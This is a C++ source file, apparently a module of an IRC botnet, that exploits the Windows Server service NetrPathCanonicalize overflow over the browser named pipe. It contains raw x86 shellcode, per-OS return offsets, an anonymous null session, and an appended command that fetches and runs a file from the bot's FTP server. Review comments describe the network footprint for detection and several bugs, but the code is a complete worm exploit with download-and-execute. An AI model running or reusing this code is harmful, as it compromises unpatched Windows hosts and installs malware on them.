- #include "../includes.h"
- #include "../Base/b_functions.h"
- #include <time.h>
- #include <math.h>
- #pragma comment( lib, "mpr.lib" )
- // consts
- // MAX_FRAG_SIZE: advertised max transmit/receive size in the bind PDU and the
- // fragment limit handed to SendReqPacket_Part() by netapi().
- #define MAX_FRAG_SIZE ( 4280 )
- // PATH_SIZE: not referenced in the visible code.
- #define PATH_SIZE ( 1064 )
- // MAX_TRIES / TRY_TIMEOUT: send attempts and per-attempt wait (ms) in netapi().
- #define MAX_TRIES ( 3 )
- #define TRY_TIMEOUT ( 2000 )
- /* use:
- - EXITFUNC: thread
- - max size: 370
- - bad chars: 0x00 0x0a 0x0d 0x5c 0x5f 0x2f 0x2e
- */
- // Raw x86 payload bytes. netapi() appends a NUL-terminated command line right
- // after them (at sizeof( execute ) - 1) and passes the combined buffer through
- // EncodeRNS0() (declared elsewhere) before it is placed into the request.
- char execute[] =
- "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"
- "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99"
- "\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04"
- "\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb"
- "\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30"
- "\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09"
- "\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\xeb\x0d"
- "\x68\xef\xce\xe0\x60\x68\x98\xfe\x8a\x0e\x57\xff\xe7\xe8\xee\xff"
- "\xff\xff"; // 130 bytes 0x82
- // 7 bytes copied immediately before the encoded payload (see netapi()).
- unsigned char stack[] = "\x81\xc4\xff\xef\xff\xff\x44"; // sub esp, 4097
- // targetz
- // Per-target layout of the path argument that netapi() builds:
- //   nPathLen         - size in bytes of the path buffer
- //   nOffsetStartAddr - byte position at which nOffset1/nOffset2 are copied
- //   nShellCodeAddr   - byte position at which stack[] and the encoded payload go
- //   bIsWinXP         - selects the PEnd.Prefix contents and the offset layout
- typedef struct
- {
- const char *pszName;
- size_t nPathLen;
- size_t nOffsetStartAddr;
- size_t nShellCodeAddr;
- bool bIsWinXP;
- } Target;
- // Indexed by nTarget in netapi(): 0 = NT4/2000, 1 = XP.
- Target Targetz[] =
- {
- { "Windows NT4, 2000 (SP0-SP4)",1066, 1000, 600, false },
- { "Windows XP (SP0+SP1)", 710, 612, 0, true },
- };
- // Four-byte values written into the path buffer at nOffsetStartAddr; nOffset1
- // is used by both branches in netapi(), nOffset2 only by the XP branch.
- // NOTE(review): a non-constant initializer on a file-scope object is only
- // valid in C++, so this file is presumably built as C++ (netapi() also
- // declares variables mid-block) - confirm against the build.
- unsigned long nOffset1 = 0x00020804; // Win2k + WinXP SP1
- unsigned long nOffset2 = nOffset1 + 6; // WinXP SP0
- // -----------------------------
- #pragma pack( 1 )
- // Wire-layout structures. Packed so that sizeof() equals the bytes sent;
- // fraglength and the stub offsets computed in netapi() rely on this.
- typedef unsigned char UINT8;
- typedef unsigned short UINT16;
- //typedef unsigned long UINT32;
- // UINT32 is expected to come from a project header (includes.h) - TODO confirm.
- // Counted UNICODE string header: max length, offset, actual length. netapi()
- // fills length/maxlength in wchar_t units for the path string.
- typedef struct
- {
- UINT32 maxlength;
- UINT32 offset;
- UINT32 length;
- } UNISTR2;
- // 16-byte common header of a connection-oriented DCE-RPC PDU.
- typedef struct
- {
- UINT8 versionmaj;
- UINT8 versionmin;
- UINT8 type;
- UINT8 flags;
- UINT32 representation;
- UINT16 fraglength;
- UINT16 authlength;
- UINT32 callid;
- } RPC_Header;
- // Interface identifier: raw UUID bytes followed by the interface version.
- typedef struct
- {
- UINT8 byte[16];
- UINT32 version;
- } RPC_Iface;
- // Bind PDU (header type 11): fragment size negotiation plus one presentation
- // context carrying two syntaxes (abstract interface and transfer syntax).
- typedef struct
- {
- RPC_Header NormalHeader;
- UINT16 maxtsize;
- UINT16 maxrsize;
- UINT32 assocgid;
- UINT32 numelements;
- UINT16 contextid;
- UINT8 numsyntaxes;
- UINT8 align;
- RPC_Iface Interface1;
- RPC_Iface Interface2;
- } RPC_ReqBind;
- // Request PDU (header type 0) header; stub data follows immediately.
- typedef struct
- {
- RPC_Header NormalHeader;
- UINT32 allochint;
- UINT16 prescontext;
- UINT16 opnum;
- } RPC_ReqNorm;
- // Leading fields of the stub as assembled in netapi(): referent id and a
- // one-character server name. The path string (UNISTR2 + data) is appended
- // after this struct, not contained in it.
- typedef struct
- {
- UINT32 ReferendID;
- UNISTR2 Server;
- wchar_t Server_Data;
- char align[ 2 ];
- } NetrPathCanonicalize_Start;
- // Trailing stub fields: output buffer length, prefix string, type and flags.
- typedef struct
- {
- UINT32 OutBufLen;
- UNISTR2 Prefix;
- wchar_t Prefix_Data[ 2 ];
- UINT32 Type;
- UINT32 Flags;
- } NetrPathCanonicalize_End;
- #pragma pack()
- // -----------------------------
- ////////////////////////////////////////////////////////////////
- // Writes one DCE-RPC request PDU to hPipe and recurses for the remaining stub
- // data when it does not fit into nMaxSize bytes.
- //   hPipe         - pipe handle the PDU is written to
- //   pPacketHeader - request header template (by value: the flag and length
- //                   edits below never reach the caller's copy)
- //   pStubData     - stub bytes to send, nDataLen of them
- //   nMaxSize      - maximum PDU size including the RPC_ReqNorm header
- //   bFirst        - true for the first fragment of a request
- // Returns false when malloc() or WriteFile() fails or fewer bytes than
- // fraglength were written; true once the last fragment has been written.
- bool SendReqPacket_Part( HANDLE hPipe, RPC_ReqNorm pPacketHeader, unsigned char *pStubData, size_t nDataLen, UINT16 nMaxSize, bool bFirst )
- {
- bool bSendNext;
- unsigned char *pPacket;
- DWORD nBytesWritten;
- // first fragment
- if( bFirst )
- pPacketHeader.NormalHeader.flags |= 1; // first fragment
- else
- pPacketHeader.NormalHeader.flags &= ~1; // not first fragment
- if( ( nDataLen + sizeof( RPC_ReqNorm ) ) <= nMaxSize )
- {
- // last
- pPacketHeader.NormalHeader.fraglength = (UINT16)( nDataLen + sizeof( RPC_ReqNorm ) );
- pPacketHeader.allochint = (UINT32)nDataLen;
- pPacketHeader.NormalHeader.flags |= 2; // last fragment
- bSendNext = false;
- }
- else
- {
- // not last fragment
- pPacketHeader.NormalHeader.fraglength = (UINT16)nMaxSize;
- // allochint doubles as "stub bytes carried by this fragment" below;
- // assumes nMaxSize > sizeof( RPC_ReqNorm ) (the subtraction is unsigned).
- pPacketHeader.allochint = nMaxSize - sizeof( RPC_ReqNorm );
- pPacketHeader.NormalHeader.flags &= ~2; // not last fragment
- bSendNext = true;
- }
- // alloc packet
- pPacket = (unsigned char*)malloc( pPacketHeader.NormalHeader.fraglength );
- if( !pPacket )
- return false;
- // make packet
- // Header is stored with a struct assignment through the cast; depends on
- // the pack(1) layout of RPC_ReqNorm.
- *(RPC_ReqNorm*)pPacket = pPacketHeader; // copy header
- memcpy( &pPacket[ sizeof( RPC_ReqNorm ) ], pStubData, pPacketHeader.allochint ); // add stub data
- // send
- if( !WriteFile( hPipe, pPacket, pPacketHeader.NormalHeader.fraglength, &nBytesWritten, NULL ) ||
- nBytesWritten != pPacketHeader.NormalHeader.fraglength )
- {
- free( pPacket );
- return false;
- }
- free( pPacket );
- // send remaining
- // Tail recursion over the unsent stub bytes; bFirst is false from here on.
- if( bSendNext )
- return SendReqPacket_Part( hPipe, pPacketHeader, pStubData + pPacketHeader.allochint, nDataLen - pPacketHeader.allochint, nMaxSize, false );
- else
- return true;
- }
- // Bot exploit module: sends a malformed NetrPathCanonicalize (srvsvc opnum
- // 0x1f) request to exinfo.ip over \\host\pipe\browser and reports a response
- // timeout as success.
- // Network footprint visible in this function, useful for detection: an
- // anonymous (null) session to \\host\ipc$, an open of \\host\pipe\browser, a
- // DCE-RPC bind to the srvsvc interface, then an opnum 0x1f request whose path
- // argument is hundreds of bytes of 0x90 filler. The appended command line
- // writes an ftp script named "n" in the current directory, fetches
- // ftpfilename, runs it and deletes the script.
- //   target - unused; the address is taken from exinfo.ip
- //   conn   - cast to IRC* but not used further here
- //   exinfo - exploit parameters; only exinfo.ip is read
- // Returns TRUE only when the final overlapped read timed out (bExit); FALSE
- // when encoding or the overlapped read fails. CreateFile/WriteFile/malloc
- // failures return 1, which is the same value as TRUE.
- // Names used but not defined in this file: ftpip, ftpport, ftplogin, ftppass,
- // ftpfilename, FpHost(), EncodeRNS0(), FP_SMB, OS_WIN2K, OS_WINNT, IRC, EXINFO.
- BOOL netapi(char *target, void* conn,EXINFO exinfo)
- {
- char *pszTarget;
- char szIPC[ 8192 ];
- char szPipe[ 8192 ];
- char szShellBuf[370]; // encoded payload; 370 matches the "max size" noted above execute[]
- unsigned char RecvBuff[ 8192 ];
- unsigned char *pPath; // path argument buffer, Targetz[ nTarget ].nPathLen bytes
- unsigned char *pPacket; // complete request stub handed to SendReqPacket_Part()
- int nTarget;
- NETRESOURCE NetSource;
- DWORD nNullSessionError;
- HANDLE hPipe;
- RPC_ReqBind BindPacket;
- DWORD nBytesWritten;
- DWORD nBytesRead;
- NetrPathCanonicalize_Start PStart;
- NetrPathCanonicalize_End PEnd;
- size_t nPathLen;
- size_t nBufferPos;
- size_t nPacketSize;
- RPC_ReqNorm ReqNormalHeader;
- bool bExit;
- int nCount;
- OVERLAPPED ov;
- IRC* irc=(IRC*)conn; // not referenced again in this function
- // Set Correct offset
- nTarget = 1;
- // SMB fingerprint of the host selects the Targetz row (project symbols).
- int iHostOS=FpHost(exinfo.ip, FP_SMB);
- if(iHostOS==OS_WIN2K || OS_WINNT){
- nTarget = 0;
- }
- pszTarget = exinfo.ip;
- // Setup execshell
- // char fname[_MAX_FNAME];
- char szTempbuf[ 512 ];
- // NOTE(review): copies sizeof( szTempbuf ) bytes out of the 131-byte execute[]
- // array and therefore reads past its end; only the first sizeof( execute ) - 1
- // bytes plus the command line written below are consumed by EncodeRNS0().
- memcpy(szTempbuf, execute, sizeof(szTempbuf));
- // sprintf(fname,"s_%d%d%d%d%d.exe",rand()%9,rand()%9,rand()%9,rand()%9,rand()%9);
- // Download-and-run command line appended directly after the payload bytes;
- // ftpip/ftpport/ftplogin/ftppass/ftpfilename are globals defined elsewhere.
- // NOTE(review): the size argument is the whole buffer although writing starts
- // sizeof( execute ) - 1 bytes in, so the bound is overstated by that amount.
- DWORD nCmdLen = _snprintf( szTempbuf + sizeof( execute ) - 1, sizeof( szTempbuf ),
- "cmd /c echo open %s %s > n&echo user %s %s >> n &echo get %s >> n &echo quit >> n &ftp -n -s:n &%s&del n\r\n",
- ftpip,ftpport,ftplogin,ftppass,ftpfilename,ftpfilename);
- // Project encoder (not in this file); a zero result is treated as failure.
- int iShellSize = EncodeRNS0(szShellBuf, sizeof(szShellBuf), szTempbuf, sizeof( execute ) + nCmdLen); // sizeof( exec_Shellcode ) - 1 + nCmdLen + 1 == x - 1 + y + 1; -1 + 1 = 0
- if( !iShellSize )
- return FALSE;
- // Create NullSession
- // Anonymous (empty user/password) connection to \\host\ipc$. The result in
- // nNullSessionError is never checked, so the pipe open below runs regardless.
- if( _stricmp( pszTarget, "." ) )
- {
- _snprintf( szIPC, sizeof( szIPC ), "\\\\%s\\ipc$", pszTarget ); // change this to another pipe.... ;) -xd
- memset( &NetSource, 0 ,sizeof( NetSource ) );
- NetSource.lpRemoteName = szIPC;
- nNullSessionError = WNetAddConnection2( &NetSource, "", "", 0 );
- }
- // Connect to pipe
- // The handle is opened overlapped; only the ReadFile in the retry loop below
- // passes an OVERLAPPED, the bind WriteFile/ReadFile pass NULL.
- _snprintf( szPipe, sizeof( szPipe ), "\\\\%s\\pipe\\browser", pszTarget );
- hPipe = CreateFile( szPipe,
- GENERIC_WRITE | GENERIC_READ,
- FILE_SHARE_READ | FILE_SHARE_WRITE,
- NULL,
- OPEN_EXISTING,
- FILE_FLAG_OVERLAPPED,
- NULL );
- if( hPipe == INVALID_HANDLE_VALUE )
- {
- return 1; // NOTE(review): 1 == TRUE, unlike the FALSE returned on other failures
- }
- // Bind packet
- memset( &BindPacket, 0, sizeof( BindPacket ) );
- BindPacket.NormalHeader.versionmaj = 5;
- BindPacket.NormalHeader.versionmin = 0;
- BindPacket.NormalHeader.type = 11; // bind
- BindPacket.NormalHeader.flags = 3; // first + last fragment
- BindPacket.NormalHeader.representation = 0x00000010; // little endian
- BindPacket.NormalHeader.fraglength = sizeof( BindPacket );
- BindPacket.NormalHeader.authlength = 0;
- BindPacket.NormalHeader.callid = 0;
- BindPacket.maxtsize = MAX_FRAG_SIZE;
- BindPacket.maxrsize = MAX_FRAG_SIZE;
- BindPacket.assocgid = 0;
- BindPacket.numelements = 1;
- BindPacket.contextid = 0;
- BindPacket.numsyntaxes = 1;
- // Interface1: 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3 (srvsvc, the server service)
- memcpy( BindPacket.Interface1.byte, "\xC8\x4F\x32\x4B\x70\x16\xD3\x01\x12\x78\x5A\x47\xBF\x6E\xE1\x88", 16 );
- BindPacket.Interface1.version = 3;
- // Interface2: 8a885d04-1ceb-11c9-9fe8-08002b104860 v2 (NDR transfer syntax)
- memcpy( BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16 );
- BindPacket.Interface2.version = 2;
- // Send
- if( !WriteFile( hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL ) )
- {
- CloseHandle( hPipe );
- return 1;
- }
- // Return value and bind_ack contents are not checked.
- ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, NULL ); // dummy receive
- // Generate bad packet
- srand( (int)time( NULL ) );
- // Build packet parts
- // Both stub structs start as 0x41 filler; fields not assigned below keep it.
- memset( &PStart, 0x41, sizeof( PStart ) );
- memset( &PEnd, 0x41, sizeof( PEnd ) );
- // Start
- PStart.ReferendID = rand();
- PStart.Server.length = 1;
- PStart.Server.offset = 0;
- PStart.Server.maxlength = 1;
- // NOTE(review): as shown this is an empty wide-character literal, which does
- // not compile; presumably L'\0' was intended - verify against the original.
- PStart.Server_Data = L'';
- // End
- if( Targetz[ nTarget ].bIsWinXP )
- {
- // WinXP
- PEnd.Prefix.length = 1;
- PEnd.Prefix.offset = 0;
- PEnd.Prefix.maxlength = 1;
- memcpy( PEnd.Prefix_Data, "\x00\x00\x00\x00", 4 );
- }
- else
- {
- // Win2k
- PEnd.Prefix.length = 2;
- PEnd.Prefix.offset = 0;
- PEnd.Prefix.maxlength = 2;
- memcpy( PEnd.Prefix_Data, "\xeb\x02\x00\x00", 4 );
- }
- PEnd.OutBufLen = rand() % 250 + 1;
- PEnd.Type = rand() % 250 + 1;;
- PEnd.Flags = 0;
- // BadPath
- // Path argument: nPathLen bytes of 0x90 ending in two NULs, with stack[] plus
- // the encoded payload at nShellCodeAddr and the nOffset values at
- // nOffsetStartAddr, both taken from Targetz[ nTarget ].
- nPathLen = Targetz[ nTarget ].nPathLen;
- pPath = (unsigned char*)malloc( nPathLen );
- if( !pPath )
- {
- CloseHandle( hPipe );
- return 1;
- }
- // Nop
- memset( pPath, 0x90, nPathLen - 2 );
- // Null termination
- memset( pPath + nPathLen - 2, 0, 2 );
- // Stack
- nBufferPos = Targetz[ nTarget ].nShellCodeAddr;
- memcpy( pPath + nBufferPos, stack, sizeof( stack ) - 1 );
- nBufferPos += sizeof( stack ) - 1;
- // Shellcode
- memcpy( pPath + nBufferPos, szShellBuf, iShellSize);
- nBufferPos += iShellSize;
- // Offsets
- nBufferPos = Targetz[ nTarget ].nOffsetStartAddr;
- if( Targetz[ nTarget ].bIsWinXP )
- {
- // Win XP
- // - SP0
- memcpy( pPath + nBufferPos, &nOffset2, sizeof( nOffset1 ) );
- nBufferPos += 4;
- // - padding
- nBufferPos += 8;
- // - SP0
- memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
- nBufferPos += 4;
- // - padding
- nBufferPos += 32;
- // - SP1
- memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
- nBufferPos += 4;
- // - padding
- nBufferPos += 8;
- // - SP1
- memcpy( pPath + nBufferPos, &nOffset1, sizeof( nOffset1 ) );
- nBufferPos += 4;
- // - padding
- nBufferPos += 32;
- nBufferPos += sizeof( wchar_t );
- }
- else
- {
- //
- // Win2k
- //
- for( size_t n = 0; n < 16; n++ )
- memcpy( pPath + nBufferPos + ( n * sizeof( nOffset1 ) ), &nOffset1, sizeof( nOffset1 ) );
- }
- // Add them up
- // Stub size: leading struct, path string header, path bytes, a trailing
- // wchar_t, up to 4 bytes of alignment padding, trailing struct.
- nPacketSize =
- sizeof( PStart )
- + sizeof( UNISTR2 )
- + nPathLen + sizeof( wchar_t ) + /* for maybe an align -> */4
- + sizeof( NetrPathCanonicalize_End );
- pPacket = (unsigned char*)malloc( nPacketSize );
- if( !pPacket )
- {
- CloseHandle( hPipe );
- free( pPath );
- return 1;
- }
- memset( pPacket, 0, nPacketSize );
- nBufferPos = 0;
- memcpy( pPacket, &PStart, sizeof( PStart ) );
- nBufferPos += sizeof( NetrPathCanonicalize_Start );
- // Path string header: length counted in wchar_t units, rounded up.
- ( (UNISTR2*)( pPacket + nBufferPos ) )->length = (UINT32)ceil( (float)nPathLen / sizeof( wchar_t ) );
- ( (UNISTR2*)( pPacket + nBufferPos ) )->offset = 0;
- ( (UNISTR2*)( pPacket + nBufferPos ) )->maxlength = ( (UNISTR2*)( pPacket + nBufferPos ) )->length;
- nBufferPos += sizeof( UNISTR2 );
- memcpy( pPacket + nBufferPos, pPath, nPathLen );
- nBufferPos += nPathLen;
- // Align
- // Pad to a 4-byte boundary before the trailing fields (covered by the +4 above).
- while( nBufferPos % 4 )
- nBufferPos++;
- // ---
- memcpy( pPacket + nBufferPos, &PEnd, sizeof( PEnd ) );
- nBufferPos += sizeof( PEnd ); // nBufferPos is now the stub length sent below
- // ---
- free( pPath ); // clean up
- // Generate send header
- // DCE-RPC request for srvsvc opnum 0x1f (NetrPathCanonicalize). Fragment
- // flags and lengths are rewritten per fragment by SendReqPacket_Part().
- memset( &ReqNormalHeader, 0, sizeof( ReqNormalHeader ) );
- ReqNormalHeader.NormalHeader.versionmaj = 5;
- ReqNormalHeader.NormalHeader.versionmin = 0;
- ReqNormalHeader.NormalHeader.type = 0; // request
- ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
- ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
- ReqNormalHeader.NormalHeader.authlength = 0;
- ReqNormalHeader.NormalHeader.callid = 0;
- ReqNormalHeader.prescontext = 0;
- ReqNormalHeader.opnum = 0x1f;
- // =====================
- // Send and check response
- // Up to MAX_TRIES sends; after each one an overlapped read is started and a
- // TRY_TIMEOUT wait that expires ends the loop with bExit set (reported as TRUE).
- memset( &ov, 0, sizeof( ov ) );
- ov.hEvent = CreateEvent( NULL, TRUE, FALSE, NULL );
- bExit = false;
- nCount = 0;
- while( !bExit && nCount < MAX_TRIES )
- {
- nCount++;
- // Send request
- if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nBufferPos, MAX_FRAG_SIZE, true ) )
- break;
- // Check response
- // If CreateEvent() failed, the loop only resends MAX_TRIES times without reading.
- if( ov.hEvent )
- {
- if( !ReadFile( hPipe, RecvBuff, sizeof( RecvBuff ), &nBytesRead, &ov ) && GetLastError() != ERROR_IO_PENDING )
- return FALSE; // NOTE(review): returns without releasing hPipe, pPacket or ov.hEvent
- else
- {
- if( WaitForSingleObject( ov.hEvent, TRY_TIMEOUT ) == WAIT_TIMEOUT )
- {
- bExit = true;
- }
- }
- }
- }
- // Clean up
- CloseHandle( hPipe );
- free( pPacket );
- if( ov.hEvent )
- CloseHandle( ov.hEvent );
- // A timed-out read (no reply from the service) is what this function calls success.
- if (bExit)
- return TRUE;
- return FALSE;
- }